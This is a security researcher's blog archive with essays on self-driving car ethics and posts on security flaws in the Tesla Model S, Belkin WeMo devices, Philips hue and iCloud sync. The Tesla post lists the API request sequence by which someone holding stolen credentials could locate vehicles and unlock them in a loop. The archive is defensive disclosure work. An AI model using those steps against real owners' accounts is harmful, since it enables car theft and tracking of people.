Thoughts on Information Security, Technology, and Science

July 03, 2018

Today, the phrase “self driving cars” projects a future where cars will drive themselves. In the future, the same phrase will mean the cars of yesteryear that we had to drive ourselves.

Autonomous vehicles are computers we will put ourselves inside of, and we will depend on them to make our lives safer. These vehicles are crafted by the works of engineers, physicists, and mathematicians — indeed, it is the accuracy of the works of these individuals on whom we will entrust our safety. Upon achievement of our quest, non-autonomous vehicles are likely to be outlawed on public roadways given the perversity of the popularity of fatal car accidents because of human error. Designated private areas will let manual car drivers carry out their hobby, likely to be perceived similarly to designated smoking rooms at airports — “those weird people huddled together engaged in risky endeavors”. We will look back in time and perceive human car drivers with similar puzzlement as we do of elevator operators of the past.

Ride share apps like Uber and Lyft will swiftly embrace self driving cars. This will in turn lower the cost of rides to the point where the efficiency of hailing an autonomous car will make less people purchase their own vehicles. Tesla, however, has a competing business model where the hope is that the car will switch into taxi mode to make money for the owner while she is busy at work (Figure 1). Either way, plot twists on the concept of sole car ownership is upon us in the future.

I have written about software and architectural vulnerabilities in car systems and networks in Chapter 6: Connected Car Security Analysis — From Gas to Fully Electric of my book Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts. These types of security vulnerabilities are a serious risk and we must strive for further improvement in this area. The scope of this article, however, is to focus on risks that come to light in the realm of cross disciplinary studies — upcoming threat vectors that are rooted in the understanding of the design of these vehicles, rather than the applying of well known threat vectors to autonomous car design.

Indeed, the secure design of autonomous vehicle software calls for a polymathic thinking, a cross-disciplinary approach that not only invokes the romance of seeking out new knowledge, but also applying a holistic framework of security that includes the induction of new attack vectors that go well beyond comprehending traditional security vectors as they may apply to autonomous software.

Polymathic thinking calls upon designers to bring together realms of philosophy, economy, legalese, and socio-economic concerns, so that we can align these areas to the concerns of security and safety. As designers and citizens, cross-disciplinary conversations are the spark we need to achieve efficiency and safety from autonomous vehicles. This article series is an attempt to ignite that spark, which we begin by tackling the issue of morality and how it will relate to self-driving cars.

The Trolley Problem

Airline pilots can be faced with emergency situations that require landing at the nearest airport. Should the situation be that returning to nearest airport isn’t feasible, alternative landing sites such as fields or rivers may be an option. Highway roads, albeit hazardous given powers lines, oncoming traffic, and pedestrians, may still be an option for smaller planes. The 2-D nature of car driving, on the other hand, mostly lend to a brake or swerve split second decision on the part of the driver when it comes to avoiding accidents. In many car accidents, drivers don’t have enough time to survey the ongoing situation to make the most rational decision.

When it comes to conversations on avoiding accidents and saving lives, the classic Trolley Problem is oft cited.

Figure 2: The Trolley Problem

Wikipedia describes the problem justly:

There is a runaway trolley barreling down the railway tracks. Ahead, on the tracks, there are five people tied up and unable to move. The trolley is headed straight for them. You are standing some distance off in the train yard, next to a lever. If you pull this lever, the trolley will switch to a different set of tracks. However, you notice that there is one person tied up on the side track. You have two options:

Do nothing, and the trolley kills the five people on the main track.

Pull the lever, diverting the trolley onto the side track where it will kill one person.

Which is the most ethical choice?

The utilitarian viewpoint will deem it just to pull the lever because it minimizes the amount of lives lost. A competing viewpoint is that pulling the lever constitutes an intentional action that leads to the death of one individual while not doing anything does not actively contribute to the five deaths that would have happened anyway. The act of pulling a lever to save more lives makes some of us uncomfortable because we are actively involved in an action that kills a set of lives.

There are many other variants of the Trolley Problem that have been put forth as thought experiments, yet they are useful in arguing moral decisions that must be made by software developers who code self driving software. There are other issues besides the trolley problem that are at play — a vehicle veering of a cliff because of a bug in software code and killing the passengers. Our quest for self driving cars will get us to a world where less people die due to car accidents, yet some people will still perish for reasons such as software bugs. Who then must be held responsible for accidents and deaths? The individual developer who developed that specific piece of fault code? The car company? Legal precedence is unlikely to allow commercial companies to offload legal repercussions to the car owner for the fact that the owner has lost autonomy by virtue of the self driving capabilities.

Rodney Brooks of MIT dismisses the conversation on the Trolley Problem pertaining to self driving vehicles as “pure mental masturbation dressed up as moral philosophy” in his essay Unexpected Consequences of Self Driving Cars, Brooks writes:

Here’s a question to ask yourself. How many times when you have been driving have you had to make a forced decision on which group of people to drive into and kill? You know, the five nuns or the single child? Or the ten robbers or the single little old lady? For every time that you have faced such decision, do you feel you made the right decision in the heat of the moment? Oh, you have never had to make that decision yourself? What about all your friends and relatives? Surely they have faced this issue?

And that is my point. This is a made up question that will have no practical impact on any automobile or person for the foreseeable future. Just as these questions never come up for human drivers they won’t come up for self driving cars. It is pure mental masturbation dressed up as moral philosophy. You can set up web sites and argue about it all you want. None of that will have any practical impact, nor lead to any practical regulations about what can or can not go into automobiles. The problem is both non existent and irrelevant.

The fallacy in Brooks’ argument is that he does not take into account the split second decisioning humans are incapable of when it comes to car accidents. The time taken by our brains to decide what direction to swerve the car and hit the brakes is too long. On the other hand, sensors in autonomous vehicles have the capacity to categorize data from sensors to make decisions within milliseconds.

On March 18, 2018, an Uber autonomous test vehicle struck a pedestrian who died from injuries. The Uber vehicle had one vehicle operator in the car and no passengers. The preliminary report from the National Transportation Safety Board (NTSB) states:

According to data obtained from the self-driving system, the system first registered radar and LIDAR observations of the pedestrian about 6 seconds before impact, when the vehicle was traveling at 43 mph. As the vehicle and pedestrian paths converged, the self-driving system software classified the pedestrian as an unknown object, as a vehicle, and then as a bicycle with varying expectations of future travel path. At 1.3 seconds before impact, the self-driving system determined that an emergency braking maneuver was needed to mitigate a collision. According to Uber, emergency braking maneuvers are not enabled while the vehicle is under computer control, to reduce the potential for erratic vehicle behavior. The vehicle operator is relied on to intervene and take action. The system is not designed to alert the operator.

It is clear from the NTSB report that Uber’s autonomous software classified the pedestrian more accurately as it approached, an “unknown object” followed by “a vehicle” and then as a “bicycle” — which is accurate because the victim of the accident was crossing the road with her bicycle. The emergency braking system was disabled in this case ultimately leading to the accident. The car did not even alert the driver (by design). It is not clear yet as to when the vehicle would have started braking (6 seconds prior versus 1.3 seconds) had the automatic braking feature been enabled. Nonetheless, if the system had been enabled, the software would’ve had to make the call on when to apply the brakes, perhaps a combination of manual tuning and machine learning.

Machine learning systems are able to classify objects in images with impressive accuracy: the average human error rate is 5.1% while machine learning algorithms are able to classify images with an error rate of 2.251%. The self driving Uber was probably using a combination of Regional Convolutional Neural Networks to detect objects in near real-time. It is unknown what classification or segmentation algorithms were employed in the case of the accident, and there are a lot more algorithms in scope of a self driving car than object classifiers — yet, it is evident that the hardware and software technology in self driving cars surpass the physics of human senses.

We need to bring the issue of machine decisioning into the forefront if we are going to make any headway towards making our autonomous vehicle future safe. Brooks’ argument dismisses the need for such decisioning outright, yet we have evidence today that demonstrates that this is one of the more important issues we ought to make sure we solve in a meaningful manner. Brooks is right in saying that humans in control of a car almost never have the ability to decide upon who to drive into and kill, but his argument doesn’t account for the technical abilities of autonomous car computers that will make it possible for software to make these decisions.

Back to the topic of the Trolley Problem, engineers must account for decisions when a collision is unavoidable. These decisions will have to select from predictable outcomes, such as steering the vehicle to the left to minimize impact. These decisions will also include situations that could save the lives of the car passengers while impacting the lives of people outside of the vehicle, such as pedestrians or passengers of another vehicle. Should the car minimize the total loss of life, or should the car prioritize the lives of it’s own passengers?

Figure 3: MIT’s Moral Machine

The Moral Machine project at MIT is an effort in illustrating moral dilemmas that we are likely to face and have to “program in”. Their website includes a list of interactive dilemmas relating to machine intelligence (Figure 3).

Imagine a case where the car computes that an collision is imminent and it has to swerve to the right or to the left. The sensors of the car quickly recognize a cyclist on the right and also to the left, the difference being that the cyclist on the left is not wearing a helmet. Should the car be programmed to swerve left since the cyclist on the right is deemed “more responsible” because he is wearing a helmet (and who must conjure up this moral calculus?)? Or should it pick a side at random? Autonomous cars will continuously observe objects around them — what of the case where the car is able to scan the license plate of a nearby vehicle and classify bad drivers versus good based on collision history? Perhaps this information could be useful in navigating around potential rogue drivers that demonstrate evidence of bad driving history, but should the same information be leveraged to decide who to collide into and kill should an unavoidable collision occur?

Make it Be Utilitarian (But Not My Car)

On the topic of collision decisioning, does the general population of today prefer a utilitarian self driving vehicle? Jean-François Bonnefon et al., in their paper The social dilemma of autonomous vehicles, came up with the following analysis:

Autonomous Vehicles (AVs) should reduce traffic accidents, but they will sometimes have to choose between two evils-for example, running over pedestrians or sacrificing itself and its passenger to save them. Defining the algorithms that will help AVs make these moral decisions is a formidable challenge. We found that participants to six MTurk studies approved of utilitarian AVs (that sacrifice their passengers for the greater good), and would like others to buy them, but they would themselves prefer to ride in AVs that protect their passengers at all costs. They would disapprove of enforcing utilitarian AVs, and would be less willing to buy such a regulated AV. Accordingly, regulating for utilitarian algorithms may paradoxically increase casualties by postponing the adoption of a safer technology.

The findings are not surprising. It is straightforward to grasp the utilitarian view point from an intellectual perspective, yet all bets are off when the situation includes ourselves and our loved ones. Yet, the design of autonomous vehicles has spawned a moral challenge that humankind has not faced in the past: that we must optimize our solution to this moral dilemma, design for, and operationalize on unconscious hardware a system that will decide who is worthy of living.

In the absence of federal regulations, car companies may choose the owner to select from various types of decisions, or perhaps manufacturers may offer the prioritization of passenger lives as part of a luxury upgrade package, skewing favor towards population that is able to afford it. Figure 4 depicts a mockup of the Tesla iPhone app allowing the owner to change the setting on or off.

It is plausible to imagine federal regulations that compel that a utilitarian mode be permanently in effect. In such a world, the incentive for car owners to ‘jailbreak’, i.e. subvert the factory default software, will be high so as to prioritize the protection of their own lives. This sort of approach to

jailbreaking can extend to protocols designed for cooperation — for example, two cars halting at a stop sign simultaneously. An industry accepted protocol could propose a simple solution (in the case of 2 cars) where the cars engage in a digital coin toss and the winner gets to go first. If people were to jailbreak their car software to subvert this functionality and always go first, the situation could lead to confusion and perhaps collisions if every other car owner were to circumvent protocols in the same way.

Lessons of Pegasus

The term ‘jailbreak’ was coined by communities that have work to modify the iOS operating system that powers iPhones and iPads. Apple has asserted tight controls on their devices that people in the jailbreak community wish to circumvent so that they are able to further customize and add features to their devices that are not offered by Apple.

In 2016, the security community was alerted to a sophisticated iOS spyware named Pegasus that was found by Bill Marczak and engineers at the security company Lookout. An activist friend of Marczak located in the United Arab Emirates forwarded him a suspicious SMS message he received that contained an Internet link that when clicked led to the immediate installation of spyware. Upon analysis, it became evident that this spyware leveraged three vulnerabilities in iOS to remotely exploit an iPhone and gain full control. Numerous attribution theories circulate this incident, the most notable being the NSO Group, an Israeli spyware company. Researches found references to NSO in the source code for Pegasus, along with evidence that in addition to the targeting of Ahmed Mansoor in the UAE, the exploit was also targeted towards Mexican journalist Rafael Cabrera, and quite possibly additional targets in Israel, Turkey, Thailand, Qatar, Kenya, Uzbekistan, Mozambique, Morocco, Yemen, Hungary, Saudi Arabia, Nigeria, and Bahrain.

Remotely exploitable vulnerabilities in iOS are sought after not only because iPhones and iPads enjoy a healthy market share, but also because finding these vulnerabilities is harder in Apple’s products. In Apple’s iOS Security Guide document, the emphasis on system security is emphasized, i.e. utmost care is taken to make sure that only authorized source code is executed by the devices and that various security mechanisms work in tandem to make remotely exploitable conditions difficult.

In my book Abusing the Internet of Things, I have outlined the nature of the Controller Area Network (CAN) architecture in cars, which in essence is like a computer network where all other physically connected computers are fully trusted. Electronic Control Units (ECUs) are various computers in the car that relay various sensor information as well as command other ECUs to take specific action. Traditionally, the attack vectors targeting such an architecture has required physical access to the car. With the prevalence of telematics that employ cellular communications that essentially puts modern cars on the Internet, the CAN architecture is not sufficient to provide reasonable security assurance, i.e. should an external hacker be able to hack into the car by exploiting a flaw in the telematics software, she could then remotely control the rest of the car. Such as scenario can pose an exponential impact should the attacker choose to infect and command cars en masse. Elon Musk has publicly stated that such a fleet-wide hack is one of his concerns.

As with iOS devices, remotely exploitable vulnerabilities can not only allow hackers to access and command the infected device, but also to jailbreak the device to subvert functionality. Circling back to our discussion on “programming in” moral rulesets per federal regulations, security vulnerabilities can allow individuals to jailbreak their autonomous vehicles and bypass these controls.

The rumor of Apple building an autonomous vehicle has been upon the media for a few years now. A case could be made, albeit speculatively, that Apple may have an advantage of successfully operationalizing architecture that makes it difficult to bypass security controls that are built in to the product. In more tangible news, companies such as General Motors has appointed executive roles to foresee the secure design and architecture of vehicles.

An argument can be made in the favor of vehicle jailbreaking in terms of humanitarian situations where journalists may be assigned vehicles that prohibit access to certain areas. These situations will have to be carefully weighed agains the double edged nature of implementing security mechanisms that are hard to circumvent.

Relentless Optimism

The prevalence of autonomous vehicles is going to bring about moral dilemmas into our lives that have traditionally been confined to the province of academic contemplation. The transformative and disruptive nature of these technologies are bound to ignite legal discussions and precedences that may advance or even temporarily slow down adoption of self driving cars.

The compute power of self driving cars will put is in a position to lower the death rates due to vehicle collisions, yet we are bound to be faced with deaths due to unavoidable collisions. In other words, less people will die, but they will die for reasons that are uncommon to our emotional faculties such as software bugs, non-compliance due to circumvention of programmed moral controls, unfair moral controls and the lack of regulation, and many unforeseen reasons that we will uncover.

The status quo of 1.25 million global deaths due to road traffic crashes is not acceptable. Add to this number the countless suffering of people that are injured in countless crashes. Not to mention the countless hours of time spent in commute that can be utilized by people to instead spend time doing constructive things and having meaningful conversations. It is clear that our advancements in technology is the way to achieve improvement that will benefit us greatly, and while we may have misgivings on our way to success, the notion that we are moving towards betterment ought to fill us with unbounded and relentless optimism for the years ahead.

February 10, 2016

“The book is written in a spritely, writerly fashion, with many grace notes and interesting case studies -- including an account of how you could use someone's hacked email account to steal their Tesla automobile.

This book is a marvelous thing: an important intervention in the policy debate about information security and a practical text for people trying to improve the situation”.

The book begins with a deep dive into the design and architecture of one of the more popular IoT products available in the market: the Philips hue personal lighting system. This chapter presents various security issues in the system, including fundamental concerns such as password security and the possibility of malware abusing weak authorization mechanisms to cause sustained blackouts. We also discuss the complexity of internetworking our online spaces (such as Facebook) with IoT devices, which can lead to security issues spanning multiple platforms.

This chapter takes a look at the security vulnerabilities surrounding existing electronic door locks, their wireless mechanisms, and their integration with mobile devices. We also present actual case studies of attackers who have exploited these issues to conduct robberies.

Chapter 3: Assaulting the Radio Nurse—Breaching Baby Monitors and One Other Thing

Security defects in remotely controllable baby monitors are covered in this chapter. We take a look at details of actual vulnerabilities that have been abused by attackers and show how simple design aws can put the safety of families at risk.

Companies like SmartThings sell suites of IoT devices and sensors that can be leveraged to protect the home, such as by receiving a notification of a potential intruder if the main door of a home is opened after midnight. The fact that these devices use the Internet to operate has increased our dependency on network connectivity, thereby blurring the lines between our physical world and the cyber world. We take a look at the security of the SmartThings suite of products and explore how they are designed to securely operate with devices from other manufacturers.

Chapter 5: The Idiot Box—Attacking “Smart” Televisions

Televisions today are essentially computers running powerful operating systems such as Linux. They connect to the home WiFi network and support services such as watching streaming video, videoconferencing, social networking, and instant messaging. This chapter studies actual vulnerabilities in Samsung branded TVs to understand the root causes of the flaws and the potential impacts on our privacy and safety.

Chapter 6: Connected Car Security Analysis—From Gas to Fully Electric

Cars are also “things” that are now accessible and controllable remotely. Unlike with many other devices, the interconnectedness of the car can serve important safety functions — yet security vulnerabilities in cars can lead to the loss of lives. This chapter studies a low-range wireless system, followed by a review of extensive research performed by leading experts in academia. We analyze and discuss features that can be found in the Tesla Model S sedan, including possible ways the security of the car could be improved.

Chapter 7: Secure Prototyping—littleBits and cloudBit

The first order of business when designing an IoT product is to create a prototype, to make certain the idea is feasible, to explore alternative design concepts, and to develop specifications to build a solid business case. It is extremely important to design security in the initial prototype and subsequent iterations toward the final product. Security as an afterthought is bound to lead to finished products that put the safety and privacy of the consumers at risk. In this chapter, we prototype an SMS doorbell that uses the littleBits prototyping platform. The cloudBit module helps us provide remote wireless connectivity, so we can prototype our IoT idea to send an SMS message to the user when the doorbell is pressed. Discussion of the prototype steps through security issues and requirements considered when designing the prototype, and we also discuss important security considerations that should be addressed by product designers.

Over the next few years, our dependence on IoT devices in our lives is bound to skyrocket. In this chapter, we predict plausible scenarios of attacks based upon our understanding of how IoT devices will serve our needs in the future.

Chapter 9: Two Scenarios—Intentions and Outcomes

In this chapter, we take a look at two different hypothetical scenarios to gain a good appreciation of how people can influence security incidents. In the first scenario, we explore how an executive at a large corporation attempts to leverage the “buzz” surrounding the topic of IoT security with the intention of impressing the board of directors. In the second scenario, we look at how an up-and-coming IoT service provider chooses to engage with and respond to researchers and journalists, with the intention of preserving the integrity of its business. The goal of this chapter is to illustrate that, ultimately, the consequences of security-related scenarios are heavily influenced by the intentions and actions of the people involved.

The innovation behind Tesla’s electric vehicles has set us in the right direction towards a more sustainable future. What Elon Musk is doing with Tesla and SpaceX is inspirational and a triumph for humankind.

Given the fantastic future of IoT (Internet of Things) devices ahead of us, it is the responsibility of the security community and device manufacturers to do our best to enable these devices securely. The IoT devices in scope include remotely controllable thermostats, baby monitors, light bulbs, door locks, cars, and many more. The impact of security vulnerabilities targeting such devices can lead be physical in nature in addition to contributing to loss of privacy.

The purpose of this document is to outline the mechanisms by which the Tesla Model S communicates with car owners and the Tesla infrastructure using a variety of TCP/IP mechanisms. The goal of this document is to advise the owners on security issues they should be aware of as well as to kick off a dialogue between security researchers and Tesla Motors that will ultimately drive deeper analysis and assurance.

The Tesla Model S P85+

The Tesla Model S is currently configurable within the following different options:

The Tesla Model S is fully electric. In addition to charge stations available in most metro areas, they can also be charged for free (for life) at any of the Tesla Super-charging stations.

Figure 2: The center display.

The center display depicted in Figure 2 is one of the popular features of the car. The display not only lets you control media, access navigation, turn on the rear view camera, but it also lets you adjust the suspension, open the panoramic roof, lock and unlock doors, and adjust the hight and breaking of the vehicle. This is all done via the touch screen.

The Tesla Model S is a truly innovative product. In the next section, we will take a look at some preliminary security issues that may be helpful to owners as well as to other security researchers to assist with deeper level analysis.

Threats

In this section, we will discuss potential security issues.

1. Six character password can lead to car being located and unlocked via Malware, Phishing, and Password Leaks.

The password requirement for a new user account is 6 characters with at least one number and one letter (Figure 3).

Figure 4: Tesla Model S iPhone App

Once the car is delivered, the user can use the iOS app to control the car, inclusive of unlocking the car, checking on the car’s location and charge status (Figure 4).

The following are the implications as a result of this design:

1. Brute-force attacks:The Tesla website doesn’t seem to have any particular account lockout policy per incorrect login attempts. This puts owners at risk since a malicious entity can attempt to brute-force the account and gain access to the iPhone functionality.

2. Phishing attacks: Given that the only control around the iPhone app is a password, the situation is ripe for potential attackers to steal credentials using phishing attacks. Once credentials are gathered, phishers can easily check the location of the cars for the accounts they have compromised by using the Tesla REST API [ http://docs.timdorr.apiary.io ](destination https://portal.vn.teslamotors.com/) by following these steps:

A. Login by submitting to /login and setting the user_session[email] and user_session[password] parameters.

B. Use the session token from A. to obtain the vehicle list by submitting a GET request to /vehicles.

C. User the vehicle id obtained in B. to query the location of the vehicle by submitting a GET request to /vehicles/{id}/command/drive_state. This will return the location in the form of latitude and longitude.

Once the phisher has obtained the location of the vehicles mapped to the compromised accounts he or she can unlock a particular vehicle or a set of vehicles (buy invoking the following in a loop): GET request to /vehicles/{id}/command/door_unlock.

3. Malware attacks: Future generation malware is likely to pick up static 1-factor passwords pertaining to vehicles such as the Tesla and ferry them to botnet herders giving them substantial power into locating and controlling (unlocking the car, for example) vehicles.

4. Password leaks: Users have a tendency to re-use their credentials on other services as well. This creates a situation where an attacker that has compromised a major website can attempt to try the same password credentials on Tesla website and iPhone app. We also see situations of major password leaks on a daily basis. An attacker can easily use usernames and passwords from such leaks and attempt login on the Tesla iOS app (or automate the process described in 2. using the REST API) to locate and unlock cars.

5. Social engineering and Tesla employees: In addition to these issues, it is widely known amongst Tesla owners that Tesla customer service has the ability to unlock cars remotely. It is unclear what consistent requirements owners have to go through to verify their identity. Without clear requirements, it is possible that a malicious entity may be successful in social engineering Tesla customer service to unlock someone else’s car. It is also unclear what background checks Tesla employees are subject to prior to be given the power to unlock any Tesla car.

6. Email account compromise:Any user with temporary access to the owner’s email can reset the owner’s password. The user will not be required to answer any secret questions or any additional information. For an expensive car such as the Tesla Model S and the physical consequences of theft of material inside the car, it is recommended that owners protect their email accounts by:

A. Setting up a separate GMail account that is not tied to any other service and enable 2 factor auth.

B. Link this GMail email address to their Tesla profile.

On a somewhat positive note, it was noted that the Tesla website incorporates an anti-CSRF token (form_token) which prevents malicious website from taking over the user’s account by invoking a POST request to the /user/me/edit functionality which lets users change their password and username.

The Tesla iOS App uses a REST API to communicate and send commands to the car. Tesla has not intended for this API to be directly invoked by 3rd parties. However, 3rd party apps have already started to leverage the Tesla REST API to build applications.

As an example, The Tesla for Glass application lets users monitor and control their Teslas using Google Glass.

In order to setup this application, Google glass owners have to authorize and add the app. Once this step is complete, the user is redirected to a login page as shown in Figure 5. On this page, the user enters their http://www.teslamotors.com/ login information.

Figure 6: Tesla website credentials are collected by third party app

As shown in Figure 6, user credentials are sent to teslaglass.appspot.com. Therefore, in this case, it can be assumed that the 3rd party is using the user credentials to invoke the Tesla REST API on behalf of the user. This leads to the following risk for the owners:

In the meanwhile, Tesla owners are strongly encouraged not to use third party applications.

Potential Low Hanging Fruit

The Tesla connects outbound via 3G and can also hop onto a local Wi-Fi.

Figure 7: Capture of outbound connection from Tesla Model S on Wi-Fi

When the Model S is configured to use Wi-Fi, it was noted that it established an outbound connection to 209.11.133.29 using the OpenVPN protocol. It was also noted that a HEAD request was issued to 23.209.17.60 which resulted in a 400 bad-request response.

- Majority of the data noticed by plugging into the connector appears to be broadcast UDP packets with car status information.

Here are the potential implications and low hanging fruit:

- The outgoing connection using OpenVPN can be configured using pre-shared keys, or username and password based, or using certificates. It will be interesting to see where in the internal filesystem this information is located. Once this information is obtained, a potential intruder count test the internal network infrastructure of the OpenVPN end-point and also the integrity of how software updates are performed.

- It is currently unclear if the UDP broadcast data can be abused to comply the car into settings that could be potentially dangerous and/or to over-ride safety precautions.

- The exposure of the raw internal network just by plugging in appears to be dangerous in the case where a malicious valet service may abuse temporary physical access.

Conclusions

Based on the issues outlined in this document, the following are the take-away points:

1. Tesla should address the issue of using static passwords with low complexity requirements.

2. Tesla owners should be aware of risks based on the current situation and take precautions outlined in this document.

3. Until Tesla announces an SDK and methods they are going to outline to sandbox applications, users should refrain from using third party applications.

4. The forum discussion referred to in the Low Hanging Fruit section fascinating. It is clear that Tesla owners want to engage in an open dialogue where they are assured by Tesla what security architectures are being utilized to secure the cars. This is analogous to how Apple described how the iMessage infrastructure is secured to put personal and corporate users at ease.

The Tesla Model S is a great car and a fantastic product of innovation. Owners of Tesla as well as other cars are increasingly relying on information security to protect the physical safety of their loved ones and their belongings. Given the serious nature of this topic, we know we can’t attempt to secure our vehicles the way we have attempted to secure our workstations at home in the past by relying on static passwords and trusted networks. The implications to physical security and privacy in this context have raised stakes to the next level.

Tesla has demonstrated innovation leaps and beyond other car manufacturers. It is hoped that this document will encourage owners to think deeply about doing their part as well as for Tesla to have an open dialogue with it’s owners on what they are doing to take security seriously.

October 22, 2013

It’s been a decade since we’ve accepted the idea that the perimeter strategy to security is ineffective: The endpoints must strive to protect their own stack rather than rely on their network segment being completely trust worthy. However, this notion has mostly permeated the corporate space as an emergency. Even such, businesses are still struggling with implementing controls in this area given the legacy of flat networks and Operating System design.

When it comes to residences, the implicit notion is that controls beyond Network Address Translation (NAT) aren’t immediately necessary from the perspective of cost and complexity. The emergence of Internet of Things (IoT) is going to dramatically change this notion.

In the case of the baby monitor, one glaring design issue was that anyone with one-time access to the local Wi-Fi where the monitor is installed can listen in without authentication and can continue to listen in remotely. This is also called out buy Amazon reviewer Lon J. Seidman in his review titled "Poor security, iOS background tasks not reliable enough for child safety":

"...But that's not the only issue plaguing this device. The other is a very poor security model that leaves the WeMo open to unwelcome monitoring. The WeMo allows any iOS device on your network to connect to it and listen in without a password. If that's not bad enough, when an iPhone has connected once on the local network it can later tune into the monitor from anywhere in the world".

Figure 3: Demonstration of WeMo baby app concern

I've demonstrated the issue Sediman points out in the video above. The paper goes into more technical details.

Figure 4: Demonstration of malware turning the WeMo switch off

In the case of the WeMo switch, it was found that any local device can turn it off without any additional authorization. In the paper, I describe how to write a script to do this.

The Belkin NetCam uses SSL and requires the user to log-in even if the user is on the local Wi-Fi. However, as shown in Figure 5, it does manage to send the credentials in clear to a remote server. This enables local malware or any server in the path via the ISP to capture the credentials and spy on the camera owners.

Given the upcoming revolution of automation in our homes, we are already seeing self-installable IoT devices such as the candidates discussed. As seen by the detailed illustrations in the above examples, we cannot secure our future by asserting that IoT devices and supporting applications have no responsibility to protecting the user’s privacy and security beyond requiring the user setup a strong WiFi password.

IoT device manufacturers should lay the foundation for a strong security architecture that is usable as well as not easily susceptible to other devices on the network. In these times, a compromised device on a home network can lead to the loss of financial information and personal information. If IoT device vendors continue their approach of depending on the local home network and all other device being completely secure, we will live in a world where a compromised device can result in gross remote violation of privacy and physical security of it’s customers.

August 13, 2013

The phenomenon of the Internet of Things (IoT) is positively influencing our lives by augmenting our spaces with intelligent and connected devices. Examples of these devices include lightbulbs, motion sensors, door locks, video cameras, thermostats, and power outlets. By 2022, the average household with two teenage children will own roughly 50 such Internet connected devices, according to estimates by the Organization for Economic Co-Operation and Development. Our society is starting to increasingly depend upon IoT devices to promote automation and increase our well being. As such, it is important that we begin a dialogue on how we can securely enable the upcoming technology.

I am excited to release my security research on the Philips hue lighting system. The hue personal wireless system is available for purchase from the Apple Store and other outlets. Out of the box, the system comprises of wireless LED light bulbs and a wireless bridge. The light bulbs can be configured to any of 16 million colors.

I'd like to highlight a particular vulnerability that can be used by malware on an infected machine on the user's internal network to cause a sustained blackout. A video demonstration of this vulnerability can be seen in the video above. For details, please read the PDF. The sample malware script (hue_blackout.bash) can be found in Appendix A.

Here were the goals of the research:

- Lighting is critical to physical security. Smart lightbulb systems are likely to be deployed in current and new residential and corporate constructions. An abuse case such as the ability of an intruder to remotely shut off lighting in locations such as hospitals and other public venues can result in serious consequences.

- The system is easily available in the marketplace and is one of the more popular self installable wireless light bulb solutions.

- The architecture employs a mix of network protocols and application interfaces that is interesting to evaluate from a design perspective. It is likely that competing products will deploy similar interfaces thereby inheriting abuse cases.

The hue system is a wonderfully innovative product. It is therefore important is to understand how it works and to ultimately push forward the secure enablement of similar IoT products.

January 29, 2013

The “protect the data, not the (mobile) device” mantra is permeating across organizations today, and that is a good thing. In this article, I wish to support the thought process by lending evidence for the following hypothesis: cloud synchronization services are likely to become a popular attack target by way of the desktop which is currently the weakest link.

In other words (and using Apple’s ecosystem as an example):

Individuals in the work place that use an iOS device (iPhone or iPad) also own a desktop (or laptop).

The desktop operating system (OSX or Windows) is still the choice avenue of attack.

Most users use iCloud to sync data between their applications on various devices. Note that iCloud files sync across devices regardless of if there is a corresponding app installed on the particular device.

A malware or root-kit that infects the desktop can steal and influence data that is synced using iCloud (as illustrated in the rest of this article).

Figure 1: Core iCloud services provide by Apple

The iCloud service offers two distinct services. As shown in Figure 1, the set of core services allows the user to backup and restore their device, as well as sync (i)Messages, contacts, calendars, reminders, Safari bookmarks & open tabs, notes, Passbook information, photos, and use the Find My iPhone feature.

These services can be turned on individually or managed via an MDM (Mobile Device Management) solution. Should these services be utilized, the “keys to the kingdom” in being able to access the user’s device data fully relies upon the strength and secrecy of the user’s iCloud password. In my blog post titled Apple’s iCloud: Thoughts on Security and the Storage APIs [PDF], I also discuss this risk in addition to a possibility of automated tools that scrape credentials of users compromised from other attacks (and published in forums and avenues such as @PasteinLeaks) to capture users’ iOS device data en masse.

Figure 2: iCloud Storage APIs (turned off in this case)

The second service offered as part of the iCloud services are Storage APIs that 3rd party developers can use to have the user’s sessions and application data seamlessly sync across devices and Operating Systems. This feature is the focus of this write-up.

Figure 3: iCloud directory in the GoodReader app on the iPhone

Figure 4: iCloud directory in the GoodReader app on the iPad

For example, the GoodReader app can be configured to use iCloud to manage documents across devices (iPhone in Figure 3 and the iPad in Figure 4).

For the purposes of the attack vector, assume that the user’s Macbook Air has been compromised. Traditionally, the attacker would be limited to the data stored on the OSX file-system. If the attacker wanted to gain access to data on other devices, the best bet would be to look for backup files. However, many users these days do not routinely backup their iOS devices with their laptops and choose to utilize iCloud instead. In this situation, the attacker can directly browse to the user’s ~/Library/Mobile Documents/ directory to access application data stored by apps that utilize the iCloud Storage APIs. What’s more - any changes the attacker makes to files in this directory are synced back to the iOS devices.

At this point, the user can steal the Fiscal_Q1.pdf, delete, or alter it. These changes will be reflected onto the user’s iOS device within seconds. Imagine the implications these might have to a victim user who’s profession is in the financial, medical, and military fields.

Based on this possibility, here are some points to take away:

The desktop OS is quite likely still the weakest link and can give rise to Cross Device Attacks such as these. Future malware and rootkits are likely to exploit this. In case of iOS devices with Document sync turned on, attackers and rootkit authors are likely to take advantage of situations where one of the devices can be easily compromised. They are likely to target popular iCloud apps to steal data as well as to modify and influence business transactions to their advantage.

Developers need to be cognizant of data-flow within their apps. Not all types of data, specifically credentials, need to be synced across devices. Note that app data may also sync by way of Apple’s core backup & restore service; developers can mark files that shouldn’t by synced by invoking addSkipBackupAttributeToItemAtURL or storing the files in Library/Caches within the iOS bundle.

Enterprises must prepare to enable sync services. At the moment, the easy solution may be to configure employee devices via MDM to disable iCloud backup and documents. However, customers and employees will demand the enablement of sync services such as these will provide seamless transition across devices and increase in productivity. Perhaps the convergence of desktop and mobile Operating Systems and devices may pave the way to the right direction - it can be argued that the Sandbox mechanism in OSX that draws inspiration from the iOS sandbox architecture is one example of this.

In summary, cloud sync technologies have blurred lines surrounding data compartmentalization. Organizations that are seriously looking into creating solid mobile security strategies must accept this reality - the entire ecosystem of devices, including attack vectors across devices, should be taken into account and incorporated into the strategy.

December 05, 2011

At the 2011 World Wide Developer Conference in San Francisco, Steve Jobs revealed his vision for Apple’s iCloud: to demote the desktop as the central media hub and to seamlessly integrate the user’s experience across devices.

Apple’s iCloud service comprises of two distinct features. The first is to provide the user with the ability to backup and restore the device over the air without having to sync with an OSX or Windows computer. This mechanism is completely controlled by Apple and also provides free email and photo syncing capabilities. The second feature of iCloud allows 3rd party developers to leverage data storage capabilities within their own apps.

In this article, I will provide my initial thoughts on iCloud from a security perspective. The emphasis of this article is to discuss the iCloud storage APIs from a secure coding and implementation angle, but I will start by addressing some thoughts on the backup and restore components.

Business Implications of Device Backup and Restore Functionality

